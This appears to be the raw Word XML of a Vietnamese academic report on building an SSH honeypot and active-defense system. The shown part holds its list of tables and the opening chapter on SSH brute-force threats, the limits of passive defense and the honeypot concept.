            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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099">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng 2.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ma trận so sánh các dòng Honeypot phổ biến (Dionaea, Cowrie, Conpot, Glastopf)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">13</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9C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng 2.2</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">So sánh khía cạnh Pháp lý và Kỹ thuật: Hack-back vs Active Defense (MITRE Engage)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">16</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng 3.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng ánh xạ các Sự kiện Cowrie sang Ma trận Kỹ thuật MITRE ATT&amp;CK</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">23</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A2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng 4.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Danh sách các Module mã nguồn và Trách nhiệm xử lý trong Hệ sinh thái</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">30</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng 5.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tổng hợp kết quả kiểm thử 4 kịch bản tấn công Red Team giả lập</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">35</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A8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng 5.2</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng đo lường hiệu năng và mức tiêu thụ tài nguyên phần cứng hệ thống</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">37</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bảng 5.3</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Top 10 Quốc gia và Dải mạng phát sinh lưu lượng tấn công SSH nhiều nhất</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">39</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">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AF">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B0">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CHƯƠNG 1: TỔNG QUAN VÀ ĐẶT VẤN ĐỀ</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">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1.1 Bối cảnh An ninh mạng và Thực trạng Tấn công Dịch vụ Truy cập từ xa (SSH/Telnet)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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kỷ nguyên chuyển đổi số và bùng nổ hạ tầng điện toán đám mây (Cloud Computing), dịch vụ Secure Shell (SSH) và Telnet đóng vai trò là xương sống trong việc quản trị, cấu hình và vận hành hệ thống từ xa của hàng triệu máy chủ, thiết bị mạng và hệ thống IoT trên toàn thế giới. Do cổng mặc định TCP 22 (SSH) và TCP 23 (Telnet) bắt buộc phải mở công khai để phục vụ nhu cầu quản trị từ xa, đây luôn là mục tiêu hàng đầu bị các mạng máy tính ma (Botnet) và các nhóm tội phạm mạng nhắm đến để thực hiện các chiến dịch xâm nhập ban đầu (Initial Access).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Theo các báo cáo an ninh mạng toàn cầu gần đây của các hãng bảo mật lớn như Fortinet, Palo Alto Networks và Microsoft Threat Intelligence, hơn 85% tổng lưu lượng rà quét trái phép trên Internet hướng về các cổng quản trị từ xa. Các cuộc tấn công này diễn ra với tốc độ chóng mặt và hoàn toàn tự động, được điều khiển bởi các biến thể mã độc botnet nguy hiểm như Mirai, Gafgyt, Tsunami hay Muhstik. Những botnet này liên tục thực hiện chiến dịch dò quét địa chỉ IP toàn cầu (IP Sweeping) và thực hiện tấn công dò quét từ điển (Dictionary Brute Force) với hàng ngàn cặp tài khoản/mật khẩu phổ biến nhằm chiếm quyền điều khiển (root compromise) của máy chủ mục tiêu.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Hậu quả của việc máy chủ SSH bị xâm phạm là vô cùng thảm khốc: kẻ tấn công ngay lập tức biến máy chủ nạn nhân thành một bàn đạp nội bộ (Pivot point) để leo thang đặc quyền (Privilege Escalation), cài cắm mã độc đào tiền ảo (Cryptocurrency Miner), đánh cắp dữ liệu kinh doanh quan trọng, triển khai mã độc tống tiền (Ransomware), hoặc tuyển mộ máy chủ đó vào mạng lưới botnet để phát động các đợt tấn công từ chối dịch vụ phân tán (DDoS) quy mô terabit nhằm vào các hạ tầng trọng yếu khác.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">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1.2 Sự bế tắc của Mô hình Phòng thủ Thụ động (Passive Defense) truyền thống</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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nhiều thập kỷ qua, các chiến lược bảo mật mạng chủ yếu dựa trên triết lý 'Phòng thủ chu vi thụ động' (Passive Perimeter Defense) với các thành phần cốt lõi bao gồm Tường lửa trạng thái (Stateful Firewall), Hệ thống Phát hiện và Ngăn chặn Xâm nhập (IDS/IPS như Snort, Suricata) và phần mềm phòng chống brute-force cơ bản (như Fail2ban). Tuy nhiên, trước các chiến dịch tấn công phân tán quy mô lớn và đa hình của tội phạm mạng hiện đại, mô hình phòng thủ thụ động này đã bộc lộ những điểm nghẽn nghiêm trọng:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Thứ nhất, vấn đề 'Bội thực cảnh báo giả' (Alert Fatigue): Các hệ thống IDS truyền thống dựa vào chữ ký tĩnh (Signature-based) liên tục sinh ra hàng chục nghìn cảnh báo mỗi ngày đối với các lưu lượng quét mạng thông thường. Chuyên viên an ninh tại các trung tâm điều hành SOC không thể nào rà soát hết lượng cảnh báo khổng lồ này, dẫn đến việc bỏ sót các cuộc tấn công thực sự nguy hiểm.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Thứ hai, độ trễ phản ứng quá lớn (High Response Latency): Quy trình xử lý sự cố truyền thống phụ thuộc hoàn toàn vào con người (SOC Tier 1 Analyst). Từ khi hệ thống phát hiện có IP tấn công brute-force, chuyên viên phải kiểm tra thủ công log, tra cứu WHOIS, xác minh địa chỉ IP, sau đó mới truy cập vào firewall để thêm luật chặn IP đó. Toàn bộ chu trình này mất trung bình từ 15 đến 30 phút. Trong khoảng thời gian đó, kẻ tấn công đã có thể đoán trúng mật khẩu yếu hoặc khai thác thành công lỗ hổng bảo mật.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Thứ ba, sự thiếu hụt thông tin tình báo đối phương (Adversarial Intelligence Blindspot): Phòng thủ thụ động chỉ biết chặn và bỏ qua (Drop/Reject packet). Hệ thống hoàn toàn 'mù' về động cơ của kẻ tấn công: Kẻ tấn công là ai? Chúng đến từ đâu? Sau khi vào được hệ thống thì chúng gõ những lệnh gì? Chúng đang tìm kiếm tài liệu nào? Những mã độc nào được chúng chuẩn bị tải lên? Việc thiếu vắng hoàn toàn các dữ liệu TTPs (Tactics, Techniques, and Procedures) này khiến đội ngũ phòng thủ luôn ở vị thế đi sau kẻ tấn công một bước.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">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1.3 Khái niệm Công nghệ Bẫy Honeypot và Sự dịch chuyển sang Phòng thủ Chủ động (Active Defense)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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khắc phục sự mù mờ về thông tin của phòng thủ thụ động, công nghệ Bẫy (Honeypot) đã ra đời như một bước tiến quan trọng. Honeypot là một tài nguyên công nghệ thông tin được thiết kế và triển khai với mục đích duy nhất: trở thành một chiếc bẫy mồi nhử để kẻ tấn công xâm nhập và tương tác, trong khi toàn bộ hành vi, tổ hợp phím gõ, kịch bản khai thác và mã độc của đối phương đều bị ghi lại một cách bí mật và toàn vẹn.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
